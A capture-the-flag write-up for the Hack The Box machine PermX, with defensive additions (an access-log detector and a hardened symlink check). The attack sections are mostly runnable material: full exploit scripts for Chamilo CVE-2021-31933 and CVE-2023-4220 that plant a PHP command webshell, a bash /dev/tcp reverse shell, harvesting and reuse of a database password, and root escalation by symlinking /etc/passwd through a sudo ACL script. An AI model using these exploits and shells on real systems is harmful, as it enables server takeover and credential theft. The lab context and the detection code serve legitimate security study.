HTB:PermX[WriteUP]

Contents

Connect to the HTB server and start the target machine

1. How many TCP ports are listening on PermX?

Scan the target's TCP ports with nmap

2. What is the default domain name used by the web server on the box?

Request port 80 of the target with curl

3. On what subdomain of permx.htb is there an online learning platform?

Fuzz subdomains of the domain with ffuf

Open the subdomain directly in a browser

4. What is the name of the application running on lms.permx.htb?

Inspect the site's technology stack with Wappalyzer

5. What version of Chamilo is running on PermX?

Fuzz paths on the subdomain with ffuf

Open robots.txt on the subdomain in a browser

6. What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?

Start Metasploit

Search cve.mitre.org for vulnerabilities in this application

7. What user is the webserver running as on PermX?

8. What is the full path to the file that holds configuration data to include the database connection information for Chamilo?

Start an nc listener on the attacker side

9. Submit the flag located in the mtz user's home directory.

USER_FLAG: 7239022c6248c28ed2945734c9e07ac9

10. What is the full path to the script that the mtz user can run as any user without a password?

11. /opt/acl.sh allows changing the access control list on files in what directory? (Don't include the trailing / on the directory.)

12. Does setfacl follow symbolic links by default? (YES)

13. Submit the flag located in the root user's home directory.

ROOT_FLAG: 86f2867102ba7ec4855205a4f2096539


Connect to the HTB server and start the target machine

Target IP: 10.10.11.23

Assigned attacker IP: 10.10.14.12


1. How many TCP ports are listening on PermX?

Scan all TCP ports of the target with nmap

nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.11.23

The scan shows two open ports: 22 and 80


2. What is the default domain name used by the web server on the box?

Request port 80 of the target with curl

curl -I 10.10.11.23:80

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I 10.10.11.23:80
HTTP/1.1 302 Found
Date: Mon, 04 Nov 2024 00:32:59 GMT
Server: Apache/2.4.52 (Ubuntu)
Location: http://permx.htb
Content-Type: text/html; charset=iso-8859-1

The output shows that a request to the bare IP is redirected to permx.htb


3. On what subdomain of permx.htb is there an online learning platform?

Map the target IP to the domain name

echo '10.10.11.23 permx.htb' >> /etc/hosts

Fuzz subdomains with ffuf by varying the Host header; -fc 302 drops the default vhost's redirect response seen above, so only Host values the server actually serves remain

ffuf -u http://permx.htb -H 'Host: FUZZ.permx.htb' -w ../dictionary/subdomains-top1mil-5000.txt -fc 302

Map the target IP to the discovered subdomain as well

echo '10.10.11.23 lms.permx.htb' >> /etc/hosts

Open the subdomain directly in a browser

The page is Chamilo, so the subdomain lms.permx.htb hosts an online learning platform


4. What is the name of the application running on lms.permx.htb?

Inspect the site's technology stack with Wappalyzer

The web application on this page is Chamilo (a learning management system)


5. What version of Chamilo is running on PermX?

Fuzz paths on the subdomain with ffuf

ffuf -u http://lms.permx.htb/FUZZ -w ../dictionary/common.txt

Open robots.txt on the subdomain in a browser

Browse into the documentation directory it lists

The page title gives the version: Chamilo 1.11


6. What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?

Search for known exploits against this application

searchsploit Chamilo

Copy the RCE-related exploit into the current directory

searchsploit -m 49867.py

Inspect the exploit code

cat 49867.py
# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)
# Date: 13/05/2021
# Exploit Author: M. Cory Billington (@_th3y)
# Vendor Homepage: https://chamilo.org
# Software Link: https://github.com/chamilo/chamilo-lms
# Version: 1.11.14
# Tested on: Ubuntu 20.04.2 LTS
# CVE: CVE-2021-31933
# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/

from requests import Session
from random import choice
from string import ascii_lowercase

import requests

# This is all configuration stuff,
url = "http://127.0.0.1/chamilo-lms/"  # URL to remote host web root
user_name = "admin"  # User must be an administrator
password = "admin"
command = "id;whoami"

# Where you want to upload your webshell. Must be writable by web server user.
# This spot isn't protected by .htaccess
webshell_path = 'web/'
webshell_name = f"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar"  # Just a random name for webshell file
content = f"<?php echo `{command}`; ?>"


def main():
    # Run a context manager with a session object to hold login session after login
    with Session() as s:
        login_url = f"{url}index.php"
        login_data = {
            "login": user_name,
            "password": password
        }
        r = s.post(login_url, data=login_data)  # login request

        # Check to see if login as admin user was successful.
        if "admin" not in r.url:
            print(f"[-] Login as {user_name} failed. Need to be admin")
            return
        print(f"[+] Logged in as {user_name}")
        print(f"[+] Cookie: {s.cookies}")

        file_upload_url = f"{url}main/upload/upload.php"

        # The 'curdirpath' is not sanitized, so I traverse to the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as well
        php_webshell_file = {
            "curdirpath": (None, f"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}"),
            "user_upload": (webshell_name, content)
        }

        ## Good command if you want to see what the request looks like without sending
        # print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))

        # Two requests required to actually upload the file
        for i in range(2):
            s.post(file_upload_url, files=php_webshell_file)

        exploit_request_url = f"{url}{webshell_path}{webshell_name}"
        print("[+] Upload complete!")
        print(f"[+] Webshell: {exploit_request_url}")

        # This is a GET request to the new webshell to trigger code execution
        command_output = s.get(exploit_request_url)
        print("[+] Command output:\n")
        print(command_output.text)


if __name__ == "__main__":
    main()

The header comments show this exploit is for CVE-2021-31933, an authenticated (admin) file upload; that is not the 2023 vulnerability the question asks for

Start Metasploit

msfconsole

Search for Chamilo modules

search Chamilo

The listed module is an unauthenticated command injection leading to RCE; switch to it

use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960

Show the module info

info

The module description shows it is based on CVE-2023-34960

Submitting that answer turned out to be wrong: the question asks specifically for the stored cross-site scripting vulnerability, which CVE-2023-34960 is not

Search cve.mitre.org for vulnerabilities in this application

Filter the results on "stored cross-site"

The matching entry is an unrestricted file upload that lets an unauthenticated attacker store JavaScript and upload a webshell: CVE-2023-4220


7. What user is the webserver running as on PermX?

I went straight to GitHub to find a public exploit for this CVE

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-

# Name       : CVE-2023-4220
# Autor      : Insomnia (Jacob S.)
# IG         : insomnia.py
# X          : @insomniadev_
# Yt         : insomnia-dev
# Github     : https://github.com/insomnia-jacob
# Description: Automation of RCE in Chamilo LMS on affected versions of CVE-2023-4220 through a web shell

import argparse
import requests
import time
from os import system
import io

# Colors
red = '\033[31m'
green = '\033[32m'
blue = '\033[34m'
yellow = '\033[93m'
reset = '\033[0m'


def arguments():
    global args
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', required=True, help='Enter the target domain, for example: http://example.com')
    args = parser.parse_args()


def check_url_exists(url):
    print(blue, '\n\n[+]', reset, 'Checking if it is vulnerable.')
    try:
        # The upload directory is reachable without authentication on vulnerable versions
        response = requests.head(url + '/main/inc/lib/javascript/bigupload/files', allow_redirects=True)
        if response.status_code == 200:
            is_vuln()
            try:
                # Reuse an already uploaded shell if one exists, otherwise upload it
                response2 = requests.head(url + '/main/inc/lib/javascript/bigupload/files/insomnia.php', allow_redirects=True)
                if response2.status_code == 200:
                    print(f'Success! open in browser: {url}/main/inc/lib/javascript/bigupload/files/insomnia.php')
                else:
                    upload_file(args.target)
            except requests.RequestException as e:
                print(red, f"[x] Error checking the URL: {e}")
                return False
        else:
            print(f'Error {url}')
    except requests.RequestException as e:
        print(red, f"[x] Error checking the URL: {e}")
        return False


def upload_file(url):
    # The 'post-unsupported' action of bigUpload.php accepts any file type from an unauthenticated client
    new_url = url + '/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
    insomnia_php = """
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
    system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
"""
    file_like_object = io.BytesIO(insomnia_php.encode('utf-8'))
    file_like_object.name = 'insomnia.php'
    files = {'bigUploadFile': file_like_object}
    response3 = requests.post(new_url, files=files)
    print(response3.status_code)
    print(f'Success! open in browser: {url}/main/inc/lib/javascript/bigupload/files/insomnia.php')


def is_vuln():
    print(red, '''
███████████████████████████
███████▀▀▀░░░░░░░▀▀▀███████
████▀░░░░░░░░░░░░░░░░░▀████
███│░░░░░░░░░░░░░░░░░░░│███
██▌│░░░░░░░░░░░░░░░░░░░│▐██
██░└┐░░░░░░░░░░░░░░░░░┌┘░██
██░░└┐░░░░░░░░░░░░░░░┌┘░░██     [*] "It is vulnerable!"
██░░┌┘▄▄▄▄▄░░░░░▄▄▄▄▄└┐░░██
██▌░│██████▌░░░▐██████│░▐██     [*] "It is vulnerable!"
███░│▐███▀▀░░▄░░▀▀███▌│░███
██▀─┘░░░░░░░▐█▌░░░░░░░└─▀██     [*] "It is vulnerable!"
██▄░░░▄▄▄▓░░▀█▀░░▓▄▄▄░░░▄██
████▄─┘██▌░░░░░░░▐██└─▄████     [*] "It is vulnerable!"
█████░░▐█─┬┬┬┬┬┬┬─█▌░░█████
████▌░░░▀┬┼┼┼┼┼┼┼┬▀░░░▐████
█████▄░░░└┴┴┴┴┴┴┴┘░░░▄█████
███████▄░░░░░░░░░░░▄███████
██████████▄▄▄▄▄▄▄██████████
███████████████████████████
''', reset)


def target(url):
    print(blue, f'             URL: {url}')
    time.sleep(3)
    system("clear")


def banner():
    textBanner = rf"""
/ __)/ )( \(  __)___(___ \ /  \(___ \( __ \ ___  / _ \(___ \(___ \ /  \ 
( (__ \ \/ / ) _)(___)/ __/(  0 )/ __/ (__ ((___)(__  ( / __/ / __/(  0 )
\___) \__/ (____)   (____) \__/(____)(____/       (__/(____)(____) \__/ 
"""
    print(green, textBanner)
    print(yellow, '                                                                            by Insomnia (Jacob S.)')


def main():
    arguments()
    banner()
    target(args.target)
    check_url_exists(args.target)


if __name__ == '__main__':
    main()

Run the exploit directly against the target

python exploit.py -t http://lms.permx.htb/

Open the URL the exploit prints and run whoami through the webshell

The output shows the current user is www-data
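The exploit above leaves two distinctive marks in the web server's access log: a POST to bigUpload.php with action=post-unsupported, and then a request for a .php file under the bigupload files directory. As an added example (not from the writeup and not part of the insomnia-jacob exploit), here is a small detector for that pattern run over constructed Apache combined-format log lines; the sample lines, the function names and the severity labels are this example's own, only the two paths come from the exploit.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Paths used by the CVE-2023-4220 exploit: the unauthenticated
# "post-unsupported" upload action and the directory uploads land in.
BIGUPLOAD_HANDLER = "/main/inc/lib/javascript/bigupload/inc/bigUpload.php"
BIGUPLOAD_FILES = "/main/inc/lib/javascript/bigupload/files/"
SCRIPT_EXTS = (".php", ".phar", ".phtml", ".php5", ".php7")

# Constructed sample lines in Apache combined format (not a capture from the box).
SAMPLE_LOG = """\
10.10.14.12 - - [04/Nov/2024:00:40:01 +0000] "GET /main/inc/lib/javascript/bigupload/files HTTP/1.1" 200 1043 "-" "python-requests/2.31.0"
10.10.14.12 - - [04/Nov/2024:00:40:02 +0000] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1" 200 12 "-" "python-requests/2.31.0"
10.10.14.12 - - [04/Nov/2024:00:40:05 +0000] "GET /main/inc/lib/javascript/bigupload/files/insomnia.php?cmd=whoami HTTP/1.1" 200 9 "-" "Mozilla/5.0"
10.10.14.50 - - [04/Nov/2024:00:41:10 +0000] "GET /index.php HTTP/1.1" 200 5321 "-" "Mozilla/5.0"
10.10.14.50 - - [04/Nov/2024:00:41:12 +0000] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    url = urlsplit(req["target"])
    req["path"] = url.path
    req["query"] = parse_qs(url.query)
    req["status"] = int(req["status"])
    return req


def classify(req):
    """Label one parsed request, or return None if it is not of interest.
    Only the 'post-unsupported' action is flagged; the normal upload action is not."""
    if (req["method"] == "POST" and req["path"] == BIGUPLOAD_HANDLER
            and "post-unsupported" in req["query"].get("action", [])):
        return "unfiltered_upload"
    if req["path"].startswith(BIGUPLOAD_FILES) and req["path"].lower().endswith(SCRIPT_EXTS):
        return "script_under_upload_dir"
    return None


def detect(log_text):
    """Return one finding per client IP that triggered at least one label.
    high   = unfiltered upload followed by a script request from the upload dir
    medium = script request from the upload dir only (possibly an older upload)
    low    = unfiltered upload seen, no script requested yet"""
    by_ip = {}
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        label = classify(req)
        if label:
            by_ip.setdefault(req["ip"], set()).add(label)
    findings = []
    for ip, labels in sorted(by_ip.items()):
        if {"unfiltered_upload", "script_under_upload_dir"} <= labels:
            severity = "high"
        elif "script_under_upload_dir" in labels:
            severity = "medium"
        else:
            severity = "low"
        findings.append({"ip": ip, "events": sorted(labels), "severity": severity})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

Correlating by client IP is what turns two individually noisy signals into a high-confidence one; a single 200 on a .php under the files directory is already worth an alert on its own, since that directory should never serve scripts.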


8. What is the full path to the file that holds configuration data to include the database connection information for Chamilo?

Start an nc listener on the attacker side

nc -lvnp 1425

Get a reverse shell through the exploit's webshell

bash -c 'bash -i >& /dev/tcp/10.10.14.12/1425 0>&1'

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.23] 53550
bash: cannot set terminal process group (1173): Inappropriate ioctl for device
bash: no job control in this shell
www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$ whoami
www-data

Upgrade to a TTY

script -c /bin/bash -q /dev/null

Search the web application for all likely configuration files and save the list

find /var/www/chamilo -name 'conf*' -type f 2>/dev/null | tee res.txt

Go through the files one by one, grepping for 'password'

cat res.txt | xargs -I {} sh -c 'cat {} | grep "password"'

Locate the file the string 03F6lY3uXAP2bkW8 came from

xargs -I {} sh -c 'grep -m1 "03F6lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt

www-data@permx:/var/www/chamilo$ xargs -I {} sh -c 'grep -m1 "03F6lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
Found in /var/www/chamilo/app/config/configuration.php

Print the matching line from that file with 5 lines of context on either side

grep -C 5 '03F6lY3uXAP2bkW8' /var/www/chamilo/app/config/configuration.php

www-data@permx:/var/www/chamilo$ grep -C 5 '03F6lY3uXAP2bkW8' /var/www/chamilo/app/config/configuration.php
// Database connection settings.
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Enable access to database management for platform admins.
$_configuration['db_manager_enabled'] = false;

/**
 * Directory settings.

Account: chamilo

Password: 03F6lY3uXAP2bkW8

To summarise, the file holding the database connection information is /var/www/chamilo/app/config/configuration.php


9. Submit the flag located in the mtz user's home directory.

List the users on the target that have a login shell

cat /etc/passwd

Try to log in over SSH as that user, reusing the database password found above

ssh mtz@10.10.11.23 

Find user.txt and read it

mtz@permx:~$ find / -name 'user.txt' 2>/dev/null
/home/mtz/user.txt
mtz@permx:~$ cat /home/mtz/user.txt
7239022c6248c28ed2945734c9e07ac9

USER_FLAG: 7239022c6248c28ed2945734c9e07ac9


10. What is the full path to the script that the mtz user can run as any user without a password?

List the commands this user may run with elevated privileges without a password

sudo -l

mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh

One script can be run as any user without a password: /opt/acl.sh


11. /opt/acl.sh allows changing the access control list on files in what directory? (Don't include the trailing / on the directory.)

Reading the script shows that it only accepts targets under /home/mtz, and that it then grants the requested permission on whatever sits at that path, symbolic links included. The answer is /home/mtz


12. Does setfacl follow symbolic links by default? (YES)

13. Submit the flag located in the root user's home directory.

Create a symbolic link named test that points at /etc/passwd

ln -s /etc/passwd /home/mtz/test

Use /opt/acl.sh to grant mtz read/write on /home/mtz/test; because setfacl follows the link, the ACL is applied to /etc/passwd itself

sudo /opt/acl.sh mtz rw /home/mtz/test

mtz@permx:~$ ln -s /etc/passwd /home/mtz/test
mtz@permx:~$ ls
priv  test  user.txt
mtz@permx:~$ sudo /opt/acl.sh mtz rw /home/mtz/test

Append a new UID 0 user with an empty password field through the link

echo '0dayhp::0:0:0dayhp:/root:/bin/bash' >> /home/mtz/test

Switch to the 0dayhp user (no password is asked for, since the password field is empty)

su 0dayhp

Find root.txt and read it

root@permx:/home/mtz# find / -name 'root.txt'
/root/root.txt
/var/www/chamilo/vendor/symfony/intl/Tests/Data/Bundle/Reader/Fixtures/txt/root.txt
root@permx:/home/mtz# cat /root/root.txt
86f2867102ba7ec4855205a4f2096539

ROOT_FLAG: 86f2867102ba7ec4855205a4f2096539
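Questions 11 to 13 together describe the bug: the path check in /opt/acl.sh looks at the string and at whether a file exists there, and setfacl then follows the link. As an added example (this is not the real /opt/acl.sh, whose contents the writeup does not reproduce), here is a check of the shape the writeup describes, "the target must be a file under /home/mtz", in the weak form that follows symbolic links next to a hardened form, plus a wrapper that also passes -P to setfacl so that setfacl itself skips links. The function names, the temporary directory layout and the file contents are this example's own.

```python
import os
import subprocess
import tempfile


def weak_check(target, base="/home/mtz"):
    """Prefix check plus os.path.isfile(): isfile() follows symlinks, so a
    link placed under base that points at /etc/passwd passes this check."""
    if ".." in target or not target.startswith(base.rstrip("/") + "/"):
        return False
    return os.path.isfile(target)


def strong_check(target, base="/home/mtz"):
    """Refuse symlinks outright, then resolve the whole path (this also
    catches a symlinked directory component) and require that the resolved
    file still lives under the resolved base directory."""
    if os.path.islink(target) or not os.path.isfile(target):
        return False
    real = os.path.realpath(target)
    real_base = os.path.realpath(base)
    return os.path.commonpath([real, real_base]) == real_base


def acl_set(user, perm, target, base="/home/mtz"):
    """Hardened wrapper: validate, then call setfacl with -P (--physical),
    which tells setfacl not to follow symbolic links either. Not exercised
    by the demo, since it needs setfacl and rights on the target."""
    if not strong_check(target, base):
        raise PermissionError("Access denied.")
    subprocess.run(["setfacl", "-P", "-m", f"u:{user}:{perm}", target], check=True)


def demo():
    """Constructed layout under a temp dir (nothing here comes from the box):
      base/note.txt          regular file
      base/link -> outside   symlink to a file outside base
      base/dir -> tmp        symlinked directory, so base/dir/secret is not
                             itself a link but still resolves outside base
    Returns which checks each path passes."""
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "home", "mtz")
        os.makedirs(base)
        outside = os.path.join(tmp, "secret")
        with open(outside, "w") as fh:
            fh.write("root:x:0:0:root:/root:/bin/bash\n")  # stand-in for /etc/passwd
        note = os.path.join(base, "note.txt")
        with open(note, "w") as fh:
            fh.write("hello\n")
        link = os.path.join(base, "link")
        os.symlink(outside, link)
        os.symlink(tmp, os.path.join(base, "dir"))
        via_dir = os.path.join(base, "dir", "secret")
        return {
            "weak_link": weak_check(link, base),          # accepted: link followed
            "weak_via_dir": weak_check(via_dir, base),    # accepted: prefix matches
            "strong_link": strong_check(link, base),      # rejected: is a symlink
            "strong_via_dir": strong_check(via_dir, base),  # rejected: resolves outside
            "strong_note": strong_check(note, base),      # accepted
            "strong_outside": strong_check(outside, base),  # rejected: not under base
        }


if __name__ == "__main__":
    for name, passed in demo().items():
        print(f"{name:16s} {'accepted' if passed else 'rejected'}")
```

Two points carry over to any privileged wrapper of this kind: validate the resolved path, not the string the caller typed, and make the privileged tool itself refuse to follow links (setfacl's -P here), so that a check bypass and a tool default do not have to both fail for the file outside the allowed directory to be touched.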
